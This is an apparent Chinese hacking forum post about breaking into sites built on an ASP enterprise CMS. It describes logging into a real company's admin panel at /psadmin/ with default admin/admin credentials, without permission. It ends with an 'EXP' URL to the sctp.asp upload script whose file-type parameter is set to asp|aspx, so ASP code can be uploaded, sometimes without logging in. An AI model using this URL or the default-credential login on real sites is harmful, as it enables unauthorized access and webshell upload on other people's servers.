By:红雪

    官方:http://www.chpanshi.net/

    Ver:asp 企业版本,后台构造基本上一摸一样。

    大牛绕过,这个没技术含量,只不过是经验之谈,兄弟们不要骂俺。(谢谢艾伦的upx8邀请码)

    闲来无事,打开网站就看到某企业网站的广告,就操起家伙(鼠标)对其安全检测一番。

    随便一看,后台路径是:http://www.xxxx.com/psadmin/ (后台名字基本上统一)

    习惯性的用 admin admin 进去了(这个就是人性的懒惰)

    鼓捣了一番看到是 ew2.8.0 版本数据库 mdb 被改成 asa 了。

    再看下有上传漏洞不,果然可以自己构造,把 jpg 换成 asp 就 OK 了,我试了几个,有些要后台权限,有的可以绕过后台直接上传。

EXP:

    http://www.xxxx.com/psadmin/inc/sctp.asp?formname=form1&editname=proPic&uppath=upfile/products&filelx=asp|aspx&enFileSize=1048576